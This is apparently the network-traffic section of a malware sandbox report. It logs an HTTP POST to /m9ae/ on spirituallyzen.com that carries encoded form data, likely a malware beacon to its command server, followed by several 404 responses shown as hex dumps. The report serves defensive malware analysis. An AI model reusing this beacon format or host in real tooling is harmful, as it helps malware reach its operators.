48 64 48 6a 4c 53 63 28 36 56 46 6d 46 30 4f 32 7a 72 75 6d 47 62 4d 30 6b 57 53 62 55 41 50 39 39 34 42 4c 66 47 57 59 6e 79 4e 52 6b 76 47 6c 43 33 72 6c 75 78 63 68 44 39 6e 67 62 30 38 71 42 79 62 59 49 77 62 77 44 75 2d 47 4f 77 2d 4a 6f 49 52 35 45 63 71 42 4a 51 65 6b 4c 33 76 28 33 28 49 34 72 67 38 68 5f 6b 50 44 79 38 5a 34 32 43 77 39 69 68 38 54 6f 32 56 74 39 49 36 54 63 63 5f 79 73 33 4d 37 56 59 58 79 65 43 32 30 30 74 46 37 6b 7a 56 74 73 38 33 47 61 72 70 4b 72 33 7a 69 53 6b 65 4a 55 76 34 32 53 6b 76 67 64 6a 71 6b 57 6f 42 64 31 4d 51 44 37 50 4f 69 38 50 52 54 33 7e 4d 38 76 48 30 56 33 79 52 64 54 28 66 54 30 61 4b 4b 78 67 49 36 6b 71 57 57 69 73 36 76 51 6a 64 69 61 72 49 30 57 39 5a 63 6c 74 7a 41 41 34 63 64 5f 38 36 28 30 4a 4c 52 4e 4b 44 4e 54 63 43 72 55 42 6e 6c 35 28 2d 35 32 61 62 34 31 6c 53 7a 66 7a 36 4e 43 36 30 73 4b 76 6a 4c 4e 68 71 31 30 62 4f 62 5f 65 4a 77 65 6c 55 58 4c 33 77 54 45 6e 55 44 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=1c0Yc-KaDaI8o3KGv3ji6SUXg9eTBDNni9d_XhfcoDrHbf2j2zJ5FqMb6CpsA2RQRH3ScC18pxaPJXUhTYZlXHdHjLSc(6VFmF0O2zrumGbM0kWSbUAP994BLfGWYnyNRkvGlC3rluxchD9ngb08qBybYIwbwDu-GOw-JoIR5EcqBJQekL3v(3(I4rg8h_kPDy8Z42Cw9ih8To2Vt9I6Tcc_ys3M7VYXyeC200tF7kzVts83GarpKr3ziSkeJUv42SkvgdjqkWoBd1MQD7POi8PRT3~M8vH0V3yRdT(fT0aKKxgI6kqWWis6vQjdiarI0W9ZcltzAA4cd_86(0JLRNKDNTcCrUBnl5(-52ab41lSzfz6NC60sKvjLNhq10bOb_eJwelUXL3wTEnUDA).
          Source: global trafficHTTP traffic detected: POST /m9ae/ HTTP/1.1Host: www.spirituallyzen.comConnection: closeContent-Length: 186Cache-Control: no-cacheOrigin: http://www.spirituallyzen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.spirituallyzen.com/m9ae/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 46 36 7a 34 3d 31 63 30 59 63 2d 4b 61 44 61 49 38 70 47 4b 47 76 47 6a 69 70 53 55 58 72 64 65 5a 42 44 4d 76 69 39 64 37 58 68 32 48 70 77 4c 48 62 4f 47 6a 33 41 68 35 49 4b 4d 55 6f 69 70 6f 4f 57 51 4b 52 48 33 6f 63 43 4a 38 70 31 79 50 4a 54 51 68 54 72 68 6d 57 48 64 46 68 4c 53 66 37 36 56 51 6d 46 34 61 32 7a 48 75 6d 41 48 4d 33 58 7e 53 62 41 67 4f 34 64 34 4d 4f 66 47 56 52 48 79 37 52 6b 75 6e 6c 43 33 4e 6c 74 4a 63 67 7a 74 6e 79 70 4d 37 67 42 79 61 62 49 78 72 34 6d 54 49 4e 64 6f 4d 45 61 74 41 6b 6e 68 49 4d 37 35 43 28 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: F6z4=1c0Yc-KaDaI8pGKGvGjipSUXrdeZBDMvi9d7Xh2HpwLHbOGj3Ah5IKMUoipoOWQKRH3ocCJ8p1yPJTQhTrhmWHdFhLSf76VQmF4a2zHumAHM3X~SbAgO4d4MOfGVRHy7RkunlC3NltJcgztnypM7gByabIxr4mTINdoMEatAknhIM75C(A).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:34:33 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 02 Oct 2022 12:42:28 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:34:35 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 02 Oct 2022 12:42:28 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 4677Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 52 6d 73 d3 c8 96 fe 0c bf e2 8c 73 67 80 aa d8 4a 26 61 76 b0 15 df 82 90 0c b9 05 24 9b 84 e5 4e 6d ed 52 6d e9 48 ea 49 ab 8f e8 6e d9 d6 4d cd fe f6 3d dd 92 5f 63 b8 70 77 0d b1 a5 7e 79 ce f3 16 ff f0 fa f2 f4 f6 f7 ab 33 28 5c a9 e0 ea c3 ab b7 17 a7 d0 eb 47 d1 c7 a3 d3 28 7a 7d fb 1a fe fe e6 f6 dd 5b 38 1c 1c c0 8d 33 32 71 51 74 f6 be 07 bd c2 b9 6a 18 45 b3 d9 6c 30 3b 1a 90 c9 a3 db eb 68 ee 51 0e fd b5 ee b1 6f c3 9d 41 ea d2 de f8 71 1c 86 cc 4b a5 ed c9 0e 80 c3 17 2f 5e b4 f7 7a fe d0 50 09 9d 9f f4 50 f7 60 f9 e4 31 50 a4 50 19 ca a4 c2 25 4a 5e 56 79 c0 98 67 3a 3a 3c e4 73 d0 7d e2 12 9d 00 7f ac 8f 9f 6b 39 3d e9 9d 92 76 a8 5d ff b6 a9 b0 07 49 fb 76 d2 73 38 77 91 1f 3e 82 a4 10 c6 a2 3b a9 5d d6 ff b5 07 d1 1a 9a 93 4e e1 f8 f8 e0 18 fa 70 f5 f2 b7 33 78 7f 79 0b e7 97 1f de bf 8e a3 76 ef f1 e3 47 fc 89 7f e8 f7 e1 65 9a c2 8d 92 29 c2 65 ed 2c f4 fb e3 76 cf 26 46 56 0e ac 49 96 02 12 4a 71 f0 c7 e7 1a 4d 33 48 a8 8c da c7 fe d1 e0 68 70 38 28 a5 1e fc 61 7b e3 38 6a 6f 8e 17 74 1e c2 45 49 2e fb b6 b1 d1 1f 36 b2 b2 ac 14 f6 71 5e 09 9d 3e 04 59 8a 5a a9 b3 ae 51 08 8e 8d e9 fc 48 ac 5d f3 72 42 69 73 5f 89 34 95 3a 1f 1e 8c 4a 61 72 a9 f9 21 63 0f fb 99 28 a5 6a 86 05 aa 29 3a 99 88 d1 9f cb 7b 7b de 64 21 35 9a fb ee ce cf 07 d5 1c 44 ed 68 34 93 a9 2b 86 bf fe f2 6b 35 df 79 03 f6 1c 55 ec f7 fd 44 24 77 b9 a1 5a a7 7d 59 8a 1c 87 b5 51 4f 9f 2c f5 86 35 1b f1 49 3e ff 69 36 f8 a3 ca 9f 3c 1b ad 5d 32 58 a1 70 43 4d dd d3 c6 e4 02 65 5e b8 e1 e1 57 68 94 32 fd 2e 1a 7c 7e 90 cb 6c 27 89 f6 a7 df 7c 83 fa 76 2c ec e5 c2 91 99 90 73 54 de 57 64 a5 93 a4 19 47 09 27 a7 38 52 98 b9 e1 d1 0b 46 c9 14 f1 00 ff fe 4f 00 e7 f3 f9 fd da e1 45 ac c7 3e 99 a3 17 ff c6 df 87 fc 38 82 2e b1 90 56 fb d5 3f 5c a4 f7 f5 09 7e 09 b5 5b 9f e2 4b d5 17 4a e6 7a 98 f0 16 9a ef 70 a0 83 83 3d 34 86 4c 42 29 de 87 e2 59 f9 0f 1c 1e 79 ae e1 75 d6 46 f9 eb c1 c1 b7 e2 4d 84 de ae e6 01 ff fb d6 eb 05 59 87 e9 a4 b9 df 1e bf 62 f7 f3 f3 05 3b eb 1a 85 43 e9 d8 83 64 b4 35 f1 5b 07 26 54 57 a4 ef 13 52 64 86 7b 2f 5f 1d 1c 6c 0e fb 79 e7 b0 6f 04 cf d1 59 27 0c 2b 02 f1 c5 11 47 87 3b 47 fc 8b fe af 8d 5c 84 e0 fd 3f 7a fe c5 4a 4c c8 39 2a 19 e5 7e 22 92 bb dc 50 ad d3 be 2c 45 8e c3 da a8 a7 4f a2 24 97 7d db d8 28 ac d9 88 4f b6 57 06 b9 cc 9e 3c 1b ad dd 32 58 21 b7 53 53 f7 b4 51 c8 a2 d5 72 78 fc ed e5 cc c4 e7 4f ab fd 85 1e 78 1e 22 0e df 23 a8 44 9a 4a 9d 0f e1 b0 4d be fd 19 41 a2 50 98 21 33 2d be 75 9a 48 12 32 a9 e4 36 ac c2 81 17 07 3f 8e a0 95 01 bf 3c 67 ec 11 94 52 f7 3b 31 3c ad 5d ea 98 1d 80 a8 1d 8d c0 e1 dc f5 39 c6 9c d7 12 06 47 f3 dd 24 a0 56 70 bf 8e a3 30 73 df 8f 42 bb 51 1e 3d fa 66 04 25 61
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 29 Nov 2022 09:34:37 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Sun, 02 Oct 2022 12:42:28 GMTAccept-Ranges: bytesContent-Length: 11816Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 20 70 72 6f 66 69 6c 65 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 50 41 47 45 20 4e 4f 54 20 46 4f 55 4e 44 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 09 09 3c 21 2d 2d 20 41 64 64 20 53 6c 69 64 65 20 4f 75 74 73 20 2d 2d 3e 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 33 2e 31 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 20 20 20 20 20 20 20 20 0a 09 09 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 63 67 69 2d 73 79 73 2f 6a 73 2f 73 69 6d 70 6c 65 2d 65 78 70 61 6e 64 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 32 30 70 78 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 74 6f 70 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 74 6f 70 5f 77 2e 6a 70 67 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 68 65 69 67 68 74 3a 31 36 38 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 23 6d 69 64 34 30 34 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 27 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 34 30 34 6d 69 64 2e 67 69 66 27 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74 2d 79 3b 77 69 64 74 68 3a 38 36 38 70 78 3b 7d 0a
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 29 Nov 2022 09:35:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Request-Id: 80efbcd2-9125-405a-a05b-a8e27ff167dbX-Runtime: 0.057525Content-Encoding: gzipData Raw: 31 34 31 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 3c eb 73 da c6 b7 df f3 57 ec 0f cf 2d b8 35 e2 e1 37 01 77 08 e0 57 6d 70 31 71 92 66 32 54 a0 05 14 0b 49 91 84 31 ee ed fd db ef 39 67 77 a5 15 18 c7 b5 7b 3f dc 99 c4 d3 44 96 76 cf fb b5 bb 67 5b fd 4f b3 d3 e8 7d ba 6a b1 49 34 75 8e de 54 f1 1f e6 98 ee b8 96 e1 6e 06 5f 70 d3 3a 7a c3 58 75 ca 23 93 0d 27 66 10 f2 a8 96 99 45 a3 fc 41 86 15 e8 53 64 47 0e 3f aa 0f 23 db 73 59 c3 73 a3 c0 73 1c 1e 54 58 eb 7e c8 7d 7a 3b 34 67 e3 49 54 2d 88 a1 38 29 8c 16 30 09 9e 18 1b 78 d6 82 fd 45 8f f0 8b 39 bc 1d 07 de cc b5 f2 43 cf f1 00 ca c6 71 1d 7f de ca 01 ea ed f6 f6 b6 7a 35 35 83 b1 ed 56 58 d1 bf 17 af fe 7e 13 03 de 62 fe 16 f3 9c 2d 36 83 ff 22 2b c6 33 02 3a f3 23 73 6a 3b 8b 0a 9b 70 e7 8e 47 f6 d0 dc 62 77 3c b0 4c 17 1e cc c0 36 61 4a 68 ba 61 3e e4 81 3d 52 d8 68 66 68 3f f0 0a 90 5b da 56 38 19 73 6c 97 e7 27 dc 06 4e 2b ac 74 b0 44 8c 1f f0 34 72 01 a2 54 4a 00 cc 27 76 c4 f3 a1 6f 0e 01 36 8c cf cf 03 d3 4f 71 04 2f 8d 81 77 9f 48 cb 0b 2c 94 34 00 61 a1 e7 d8 16 db 68 b5 5a 8a 52 df b4 2c db 1d c3 e7 58 32 8c ad 08 8b b1 b9 6d 45 93 0a 3b dc 5d a6 19 b5 cf 83 18 5b ac 90 e2 31 fc 28 2c 89 c6 40 57 8d dd f2 71 79 67 85 80 a2 b1 cb a7 ac 84 7f a7 f8 99 94 62 e0 31 5d 46 19 86 c6 d0 d3 42 35 4a 0a 00 63 9a 1e 60 46 1a 6c 79 85 e6 34 61 29 a8 e5 dd 25 55 19 16 18 bb ed 84 4f 89 b9 59 c4 9f 58 06 a4 87 7c 60 5a f6 2c ac b0 9d 44 a7 8a 2d 20 3c b1 4f c6 2c 3b f4 1d 13 4c 6f e0 78 c3 5b 05 46 29 62 7f 59 11 46 38 9b 02 a4 c4 4d 62 d5 c2 48 56 8a 19 40 67 22 4a 06 5e 14 79 d3 94 61 a4 29 7e 8c 00 e9 36 31 fb ba c9 2a 3e 56 50 55 98 eb b9 3c 25 fe 8d 21 b8 88 09 de 90 98 0e 18 2d fa 0c 59 63 4c a2 f4 d6 d8 00 4b c5 e2 7f ad 9a ce 23 66 63 84 de 2c 18 72 f6 f3 aa f5 24 92 8f 45 b4 1c 16 d4 ec bf 54 c8 59 75 a2 e6 21 fe c4 da 8d 63 12 58 78 ab 81 3f cf d0 98 20 51 97 61 ca 1f 75 6b 10 12 79 44 92 8a 54 c3 32 21 fc 2a 82 35 cb 3f 48 24 e6 41 e8 1a 39 de bc c2 cc 59 e4 ad d2 9e c4 d3 e3 e3 94 ba 0c db 1d 79 31 f0 44 6c 2b de 9a a6 c6 40 27 ea bb b3 e9 80 07 9a ab ac c6 ef b4 c4 54 10 a9 d7 e3 90 9e c8 05 9c 24 c1 1a 1b 73 20 43 6a 12 e4 9a cd a6 62 30 e2 f7 51 de 74 ec 31 24 00 1a 98 e6 0d 89 5c e6 2d ef f0 11 86 68 2d 2a 2e 87 de 55 20 95 09 0a 38 09 09 ab 7c 1e ef e1 cf ea 4c c3 84 d4 78 97 50 f1 58 8a 3b 6e c0 9f f4 d4 89 6d 59 dc 8d 11 c6 0e bb e2 6e 60 18 4c 49 f5 f0 a0 78 58 dc 7d cb fe 26 db 36 2b 77 76 08 39 05 d2 5e 3c 62 6f 6f 2f fe 6c 44 01 e4 9a fc 28 30 a7 1c 54 f8 e8 18 c5 77 fc 51 46 52 85 22 05 c3 08 b9 c3 87 69 84 62 3c 0c 97 ee b6 01 d9 3d e2 fd c8 1c 38 4a 26 71 ec 17 12 90 01 02 78 72 4c 3f 84 5c a8 9e f0 33 c1 49 c1 88 30 4d b1 48 e9 66 29 02 96 13 ab b1 2c eb 69 08 90 5b 31 6c 4a 99 2f 01 52 72 5f
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Tue, 29 Nov 2022 09:35:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Request-Id: 83a2ff74-2211-4d80-b80d-6219366e0ae4X-Runtime: 0.045031Content-Encoding: gzipData Raw: 31 33 34 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 5c 6b 57 db 46 b7 fe 9e 5f 31 35 eb d4 26 c5 f2 85 5b 20 98 2e 6a 0c a1 25 90 82 d3 26 cd ca 72 85 35 b6 55 64 c9 91 64 2e e9 9b f7 b7 9f 67 ef 99 91 46 36 26 14 7a 3e 9c b5 12 56 13 21 cd ec fb 6d 66 f6 74 e7 bb fd d3 76 f7 fd 9b 8e 18 a5 e3 60 f7 d9 0e fd 23 02 37 1c b6 4a 32 2c d1 0b e9 7a bb cf 84 d8 19 cb d4 15 fd 91 1b 27 32 6d 95 a6 e9 a0 fa a2 24 6a fc 29 f5 d3 40 ee ee f5 53 3f 0a 45 3b 0a d3 38 0a 02 19 6f 8b ce 4d 5f 4e f8 6d df 9d 0e 47 e9 4e 4d 0d a5 49 49 7a 8b 49 78 12 e2 22 f2 6e c5 df fc 88 5f dc fe e5 30 8e a6 a1 57 ed 47 41 04 28 4b 07 7b f4 f3 52 0f 30 6f 57 57 57 cd ab b1 1b 0f fd 70 5b d4 27 37 ea d5 97 67 19 e0 15 31 59 11 51 b0 22 a6 f8 2f f5 32 3c 03 d0 59 1d b8 63 3f b8 dd 16 23 19 5c c9 d4 ef bb 2b e2 4a c6 9e 1b e2 c1 8d 7d 17 53 12 37 4c aa 89 8c fd 81 c1 c6 33 13 ff b3 dc 06 b9 8d 55 83 53 88 c0 0f 65 75 24 7d 70 ba 2d 1a 2f 66 88 99 c4 b2 88 5c 81 68 34 72 00 d7 23 3f 95 d5 64 e2 f6 01 1b e3 ab d7 b1 3b 29 70 84 97 ce 45 74 93 4b 2b 8a 3d 92 34 80 88 24 0a 7c 4f 2c 75 3a 1d 43 e9 c4 f5 3c 3f 1c e2 73 26 19 21 e6 84 25 c4 b5 ef a5 a3 6d b1 b5 3e 4b 33 69 5f c6 19 b6 4c 21 f5 03 fc 18 2c b9 c6 a0 ab f6 7a f3 a0 b9 36 47 40 dd 59 97 63 d1 a0 bf 0b fc 8c 1a 19 f0 8c 2e a7 89 a1 19 f4 a2 50 9d 86 01 20 84 a5 07 cc 28 82 6d ce d1 5c 24 ac 00 b5 b9 3e a3 2a c7 83 b1 fb 41 72 9f 98 f7 eb f4 93 c9 80 f5 50 8d 5d cf 9f 26 db 62 2d d7 a9 61 0b 84 e7 f6 29 84 e7 27 93 c0 85 e9 5d 04 51 ff d2 80 31 8a d8 9c 55 84 93 4c c7 80 94 bb 49 a6 5a 8c 14 8d 8c 01 72 26 a6 e4 22 4a d3 68 5c 30 8c 22 c5 77 11 a0 dd 26 63 df 36 59 c3 c7 1c aa 6d 11 46 a1 2c 88 7f a9 0f 17 71 e1 0d b9 e9 c0 68 c9 67 d8 1a 33 12 b5 b7 66 06 d8 a8 d7 ff 67 de 74 ee 30 1b 27 89 a6 71 5f 8a e7 f3 d6 93 4b 3e 13 d1 6c 58 30 b3 ff 36 21 67 de 89 f6 b7 e8 27 d3 6e 16 93 60 e1 9d 36 fd 3c 40 63 8a 44 5b 86 05 7f b4 ad 41 49 e4 0e 49 1a 52 1d cf 45 f8 35 04 5b 96 ff 22 97 58 84 d0 35 08 a2 eb 6d e1 4e d3 68 9e f6 3c 9e 1e 1c 14 d4 e5 f8 e1 20 ca 80 e7 62 9b f3 d6 22 35 0e 39 51 2f 9c 8e 2f 64 6c b9 ca 7c fc 2e 4a cc 04 91 bd bd 2c a4 e7 72 81 93 e4 58 33 63 8e 75 48 cd 83 dc fe fe be 61 30 95 37 69 d5 0d fc 21 12 00 0f 2c f2 46 44 ce f2 56 0d e4 80 42 b4 15 15 67 43 ef 3c 90 ed 11 09 38 0f 09 f3 7c 1e 6c d0 cf fc 4c c7 45 6a bc ca a9 b8 2b c5 1d b4 f1 a7 38 75 e4 7b 9e 0c 33 84 99 c3 ce b9 1b 0c 43 18 a9 6e bd a8 6f d5 d7 5f 8a 2f 6c db ee f6 95 9f 20 a7 20 ed 65 23 36 36 36 b2 cf 4e 1a 23 d7 54 07 b1 3b 96 50 e1 9d 63 0c df d9 47 1d 49 0d 8a 02 0c 27 91 81 ec 17 11 aa f1 18 ae dd 6d 09 d9 3d 95 bd d4 bd 08 8c 4c b2 d8 af 24 a0 03 04 78 0a dc 49 82 5c 68 9e e8 33 c3 29 c0 48 29 4d 89 d4 e8 66 26 02 36 73 ab f1 3c ef 7e 08 c8 ad 14 36 b5 cc 67 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Tue, 29 Nov 2022 09:35:08 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 